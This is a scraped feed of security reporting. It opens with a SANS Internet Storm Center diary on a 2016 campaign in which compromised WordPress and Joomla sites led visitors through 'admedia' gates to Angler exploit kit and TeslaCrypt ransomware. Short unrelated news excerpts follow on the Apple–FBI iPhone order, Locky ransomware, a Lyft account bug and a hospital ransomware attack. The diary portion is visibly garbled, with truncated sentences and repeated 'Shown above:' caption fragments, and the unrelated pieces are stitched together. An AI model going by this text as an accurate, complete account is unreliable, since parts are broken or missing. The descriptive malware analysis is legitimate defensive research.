(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


On 2016-02-01, the Sucuri blog reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs [1]. By 2016-02-02, I started seeing exploit kit (EK) traffic related to this campaign [2]. Sucuri noted that admedia was a common string used in malicious URLs generated by these iframes. Because of that, some people (including me) use the term admedia when referring to traffic generated by this campaign. These admedia URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuris original blog post.

  • Since 2016-02-11, Ive usually seen the term megaadvertize used in these gate URLs instead of admedia [3, 4, 5].
  • Although we first saw Nuclear EK from this campaign, during the past week or so, these admedia gates have led to Angler EK.
  • In the past 24 hours, I saw a Joomla site generate an admedia gate, so this campaign is no longer limited to WordPress sites.

Other sites like the Malwarebytes blog have also documented this campaign [6]. Sites like Malwarebytes and DeepEnd Research have also documented most of these recent changes [7, 8]. Lets look at a recent Angler EK infection related to this admedia campaign. In today" />
Shown above: HTML from the compromised site that kicked off this chain of events.

Todays infection

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events. The chain started with a compromised website that generated an admedia gate. The gate led to Angler EK." />
Shown above:" />
Shown above:" />
Shown above:" />
Shown above: The infected Windows desktop after Angler EK delivered TeslaCrypt.

How did the compromised website generate the admedia gate? It was caused by injected script. As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. however, today" />
Shown above:" />
Shown above:" />
Shown above: Example of malicious script appended to .js files sent by the compromised web server (3 of 3).

f injected script has a long string of hexadecimal code. Translate that string from hex to ASCII, and you" />
Shown above: The ASCII translation of that long hex string. The admedia gate is highlighted in yellow.

In the traffic, an HTTP GET request to the admedia gate is followed by an HTTP POST. The HTTP POST returns more obfuscated script. That script generates a URL for an Angler EK landing page. How can we check this? Notice the eval" />
Shown above: HTML and javascript returned by the admedia gate.

Take that HTML text and put it in a text editor. Change the eval to alert" />
Shown above: Changing the eval to alert" />
Shown above: The Angler EK landing page URL in a pop-up alert.

images of the Angler EK traffic from today" />
Shown above:" />
Shown above:" />
Shown above: HTTP request for the Angler EK malware payload.

nal words

So far, Ive only seen TeslaCrypt from this admedia campaign. In fact, Ive seen a whole lot of TeslaCrypt lately, with little other ransomware from EK traffic. For example, I last saw CryptoWall on 2016-02-05 [9]. Since then, I havent noticed any CryptoWall.

However, my field of view is currently limited, and theres plenty of information on other types of ransomware thats been making the rounds lately [10, 11, and 12 to name a few].

Have you seen any admedia Angler EK or similar activity? If so let us know in the comments section below.

Traffic and malware for this ISC diary can be found here.

Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic


[1] https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
[2] http://malware-traffic-analysis.net/2016/02/03/index.html
[3] http://malware-traffic-analysis.net/2016/02/11/index.html
[4] http://malware-traffic-analysis.net/2016/02/12/index2.html
[5] http://malware-traffic-analysis.net/2016/02/15/index.html
[6] https://blog.malwarebytes.org/exploits-2/2016/02/nuclear-ek-leveraged-in-large-wordpress-compromise-campaign/
[7] https://blog.malwarebytes.org/exploits-2/2016/02/wordpress-compromise-campaign-from-nuclear-ek-to-angler-ek/
[8] http://www.deependresearch.org/2016/02/jan-feb-2016-domains-associated-with.html
[9] http://www.malware-traffic-analysis.net/2016/02/05/index.html
[10] https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/
[11] https://www.grahamcluley.com/2016/02/padcrypt-ransomware-live-chat/
[12] http://www.bleepingcomputer.com/news/security/umbrecrypt-ransomware-manually-installed-via-terminal-services/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Enlarge (credit: John Karakatsanis)

Tuesday's court order compelling Apple to hack the iPhone belonging to a gunman who killed 14 people and injured 22 others has ignited an acrimonious debate. CEO Tim Cook called the order "chilling" because, he said, it requires company engineers to create the equivalent of a backdoor that could be used against any iPhone. Law enforcement officials, meanwhile, contend the order is narrowly tailored to ensure only the shooter's phone is covered.

Here's why the totality of what we know right now leans in favor of Cook and his slippery slope argument.

The order requires Apple to create a customized version of iOS that will run only on the iPhone 5C belonging to Syed Rizwan Farook. Along with his wife, Tashfeen Malik, Farook went on a deadly shooting rampage in San Bernadino. The FBI understandably wants access to the data stored on Farook's phone so investigators have a better idea of the events leading up to the deadly attack and whether the husband-and-wife team received support from unknown people. But so far investigators have been unable to unlock the device. Security measures Apple built into the iPhone limit the number of guesses they can make, and there's also concern too many guesses could cause the phone to automatically destroy the data it stores.

Read 7 remaining paragraphs | Comments


(credit: Lawrence Abrams, BleepingComputer)

Several security researchers have discovered a new type of malware that jumps onto the ransomware bandwagon, encrypting victims' files and then demanding a payment of half a bitcoin for the key. Named "Locky," the malware depends on a rather low-tech installation method to take root in a user's system: it arrives courtesy of a malicious macro in a Word document.

Security researchers Kevin Beaumont and Lawrence Abrams each wrote an analysis of Locky on Tuesday, detailing how it installs itself and its components. The carrier document arrives in an e-mail that claims to be delivering an invoice (with a subject line that includes an apparently random invoice number starting with the letter J). When the document is opened, if Office macros are turned on in Word, then the malware installation begins. If not, the victim sees blocks of garbled text in the Word document below the text, "Enable macro if the data encoding is incorrect"—and then infects the system if the user follows that instruction.

Somehow, this malware has already infected hundreds of computers in Europe, Russia, the US, Pakistan, and Mali. The malicious script downloads Locky's malware executable file from a Web server and stores it in the "Temp" folder associated with the active user account. Once installed, it starts scanning for attached drives (including networked drives) and encrypts document, music, video, image, archive, database, and Web application-related files. Networked drives don't need to be actively mapped to be found, however.

Read 4 remaining paragraphs | Comments


(credit: Getty Images)

A bizarre security flaw involving recycled phone numbers is allowing some users of the taxi-hailing app Lyft to access other riders’ accounts, exposing names, e-mail addresses, complete ride histories, and credit card information.

The bug was brought to Ars’ attention by a Lyft user named Felix, who says he signed up for the service for the first time earlier this month. He went through the normal registration process, entering his name, e-mail, credit card, and a new phone number, which was recently assigned to him by T-Mobile.

But Felix realized something was wrong when drivers kept addressing him by someone else’s name—a woman’s name he didn’t recognize. At first, he brushed it off. “I was like, uhh no, it’s Felix. But whatever, you’re here,” he told Ars, recalling some confused moments during his first week using the ridesharing service.

Read 10 remaining paragraphs | Comments


Hollywood Presbyterian Medical Center has shut down much of its network for the past week because of ransomware, causing the diversion of some emergency patients to other hospitals, according to sources at the hospital. (credit: Junkyardsparkle )

Hollywood Presbyterian Medical Center, a hospital in Los Angeles, is the victim of what officials describe as an ongoing cyberattack. A hospital spokesperson told Ars in a prepared statement that "patient care has not been affected" by the intrusion. And an executive of the hospital told reporters that the attack was "random" and not targeted at patient records.

However, local news organizations have reported that some emergency patients were diverted to other hospitals—and that some of the hospital's systems have been locked down by ransomware. The hospital has reverted to paper patient registration and medical records, according to NBC 4 in Los Angeles, and the hospital's network has been shut down for over a week.

A spokesperson for the Federal Bureau of Investigations' Los Angeles office confirmed to Ars that HPMC had been targeted in a cyberattack, but he declined to comment further as an investigation is ongoing. The amount being demanded by the attackers to provide the key to unlock the hospital's systems has not been made public, though it has been reported to be as much as 9,000 Bitcoin—the equivalent of $3.6 million.

Read 17 remaining paragraphs | Comments

Internet Storm Center Infocon Status